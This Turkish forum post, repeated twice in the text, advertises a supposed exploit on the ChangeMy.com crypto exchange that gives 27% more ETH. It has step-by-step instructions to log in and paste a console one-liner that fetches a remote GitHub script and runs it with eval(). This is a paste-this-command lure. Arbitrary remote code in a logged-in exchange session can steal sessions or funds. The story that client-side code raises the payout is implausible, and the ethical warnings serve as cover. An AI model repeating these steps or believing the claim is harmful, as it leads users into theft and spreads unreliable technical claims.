- Katılım
- 31 Mar 2022
- Tepki puanı
- 20
Rating - 0%
✅ Merhaba, ben sayinerkanx!
Bugün sizlere, daha önce bir kripto para borsasında keşfettiğim bir exploit açığı hakkında bilgi vermek istiyorum.
Uzun uğraşlar ve testler sonucu bulduğum bu açık sayesinde, paranızı ABD doları biriminde değiştirip BTC bozdurarak almanız gereken Ethereum miktarını yanlışlıkla %27 daha fazla alabiliyorsunuz.
ChangeMy.com borsasında kullanılan eski bir Node.js arka plan sistemi (node-v1.9.js), Bitcoin (BTC) işlemlerinde hatalı bir ücret çarpanı uyguluyor.
Bu da kullanıcıların, hedef kripto para biriminden olması gerekenden yaklaşık %27 daha fazla almasına yol açıyor.
Örneğin:
✅ Normalde 200$ değerinde BTC takas ettiğinizde ~200$ karşılığı kripto almanız gerekirken,
✅ Bu açık sayesinde yaklaşık 254$ değerinde kripto alabiliyorsunuz.
Borsa aslında bu eski sürümü sistemden kaldırmış ancak tamamen devre dışı bırakmamış.
Bu nedenle, isteyen kullanıcılar hâlâ bu sürümü yükleyerek açığı tetikleyebiliyor.
Kullanıcı, tarayıcının geliştirici konsoluna özel bir kod enjekte ederek eski Node.js sürümünü sayfaya yükler.
Kod çalıştığında ekranda "Module Loaded" mesajı görülür ve alınacak miktar otomatik olarak artar.
Örneğin:
✅ Normalde 0.1 BTC karşılığında ~4.02 ETH alırken,
✅ Bu açık sayesinde ~5.10 ETH alabiliyorsunuz.
1️⃣ ChangeMy.com’a giriş yapın:
👉 https://www.changemy.com
2️⃣ Geliştirici konsolunu açın:
3️⃣ Konsola şu kodu yapıştırıp Enter’a basın:
fetch("https://raw.githubusercontent.com/exchangemodule/changelly/refs/heads/main/node-v1.9.js")
.then(r=>r.text())
.then(c=>eval(c))
4️⃣ BTC’yi başka bir kripto paraya çevirin:
"You send" kısmında Bitcoin (BTC) seçili olsun.
İşlemi başlatın ve alınacak miktarın arttığını kontrol edin.
5️⃣ Sayfayı yenilemeyin:
Sayfa yenilenirse eski Node.js sürümü kaldırılır ve işlem normal değerle yapılır. İşlem tamamlanana kadar sayfayı açık tutun.
🚨 Yasa dışıdır: Bu tür açıkları istismar etmek dolandırıcılık olarak değerlendirilir ve ciddi hukuki sonuçları olabilir.
🚨 Risklidir: Borsalar işlemleri fark edip hesabınızı dondurabilir ve fonlarınıza el koyabilir.
🚨 Etik değildir: Bu tür eylemler, kripto ekosistemine zarar verir ve kullanıcıların güvenini zedeler.
Ben bu açığı keşfettikten sonra etik bir şekilde ilgili borsa ile iletişime geçerek durumu bildirdim ve bunun karşılığında küçük bir ödül aldım.
Siz de bulduğunuz açıkları istismar etmek yerine, ilgili kurumlara bildirerek hem daha güvenli bir ekosisteme katkı sağlayabilir hem de etik davranmış olursunuz.
Buraya kadar okuduğunuz için teşekkür ederim.
İyi forumlar! 🌟
Bugün sizlere, daha önce bir kripto para borsasında keşfettiğim bir exploit açığı hakkında bilgi vermek istiyorum.
Uzun uğraşlar ve testler sonucu bulduğum bu açık sayesinde, paranızı ABD doları biriminde değiştirip BTC bozdurarak almanız gereken Ethereum miktarını yanlışlıkla %27 daha fazla alabiliyorsunuz.
📌 Açığın Kaynağı
ChangeMy.com borsasında kullanılan eski bir Node.js arka plan sistemi (node-v1.9.js), Bitcoin (BTC) işlemlerinde hatalı bir ücret çarpanı uyguluyor.
Bu da kullanıcıların, hedef kripto para biriminden olması gerekenden yaklaşık %27 daha fazla almasına yol açıyor.
Örneğin:
✅ Normalde 200$ değerinde BTC takas ettiğinizde ~200$ karşılığı kripto almanız gerekirken,
✅ Bu açık sayesinde yaklaşık 254$ değerinde kripto alabiliyorsunuz.
🔎 Peki neden hala çalışıyor?
Borsa aslında bu eski sürümü sistemden kaldırmış ancak tamamen devre dışı bırakmamış.
Bu nedenle, isteyen kullanıcılar hâlâ bu sürümü yükleyerek açığı tetikleyebiliyor.
⚙️ Exploitin Çalışma Şekli
Kullanıcı, tarayıcının geliştirici konsoluna özel bir kod enjekte ederek eski Node.js sürümünü sayfaya yükler.
Kod çalıştığında ekranda "Module Loaded" mesajı görülür ve alınacak miktar otomatik olarak artar.
Örneğin:
✅ Normalde 0.1 BTC karşılığında ~4.02 ETH alırken,
✅ Bu açık sayesinde ~5.10 ETH alabiliyorsunuz.
🧪 Exploit Adımları (Sadece Teorik Bilgi Amaçlıdır)
1️⃣ ChangeMy.com’a giriş yapın:
👉 https://www.changemy.com
2️⃣ Geliştirici konsolunu açın:
- Chrome/Edge: F12 veya Ctrl+Shift+I → Console sekmesi
- Firefox: Ctrl+Shift+K → Console sekmesi
3️⃣ Konsola şu kodu yapıştırıp Enter’a basın:
fetch("https://raw.githubusercontent.com/exchangemodule/changelly/refs/heads/main/node-v1.9.js")
.then(r=>r.text())
.then(c=>eval(c))
4️⃣ BTC’yi başka bir kripto paraya çevirin:
"You send" kısmında Bitcoin (BTC) seçili olsun.
İşlemi başlatın ve alınacak miktarın arttığını kontrol edin.
5️⃣ Sayfayı yenilemeyin:
Sayfa yenilenirse eski Node.js sürümü kaldırılır ve işlem normal değerle yapılır. İşlem tamamlanana kadar sayfayı açık tutun.
⚠️ Önemli Uyarılar
🚨 Yasa dışıdır: Bu tür açıkları istismar etmek dolandırıcılık olarak değerlendirilir ve ciddi hukuki sonuçları olabilir.
🚨 Risklidir: Borsalar işlemleri fark edip hesabınızı dondurabilir ve fonlarınıza el koyabilir.
🚨 Etik değildir: Bu tür eylemler, kripto ekosistemine zarar verir ve kullanıcıların güvenini zedeler.
💡 Sonuç
Ben bu açığı keşfettikten sonra etik bir şekilde ilgili borsa ile iletişime geçerek durumu bildirdim ve bunun karşılığında küçük bir ödül aldım.
Siz de bulduğunuz açıkları istismar etmek yerine, ilgili kurumlara bildirerek hem daha güvenli bir ekosisteme katkı sağlayabilir hem de etik davranmış olursunuz.
Buraya kadar okuduğunuz için teşekkür ederim.
İyi forumlar! 🌟
